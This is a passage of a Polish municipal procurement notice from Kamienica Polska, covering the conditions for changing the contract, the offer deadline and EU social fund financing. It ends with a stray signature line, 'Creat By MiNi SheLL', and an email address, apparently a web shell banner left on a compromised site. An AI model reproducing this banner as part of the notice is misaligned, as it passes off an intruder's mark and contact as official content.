<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy w następujących przypadkach:
- konieczność wprowadzenia zmian, które będą następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a instytucją nadzorującą realizację zadania,
- wynikają z rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony (nie dotyczy wynagrodzenia),
- nastąpi konieczność zmiany osób wykonujących zamówienie (personelu kluczowego) z następujących powodów:
a) śmierci, choroby lub innych zdarzeń losowych osób wykonujących zamówienie,
b) niewywiązywania się osób wykonujących zamówienie z obowiązków wynikających z powierzonych im zadań,
c) jeżeli zmiana osoby wykonującej zamówienie stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji),
d) zmiana jest możliwa jedynie na nowe osoby o kwalifikacjach i doświadczeniu nie niższych niż zaproponowane przez Wykonawcę w ofercie,
- w zakresie zmiany terminów realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.kamienicapolska.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kamienica Polska, ul. Konopnickiej 12, 42-260 Kamienica Polska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2012 godzina 10:00, miejsce: Urząd Gminy Kamienica Polska, ul. Konopnickiej 12, 42-260 Kamienica Polska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, działanie 9.5 Oddolne inicjatywy edukacyjne na obszarach wiejskich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com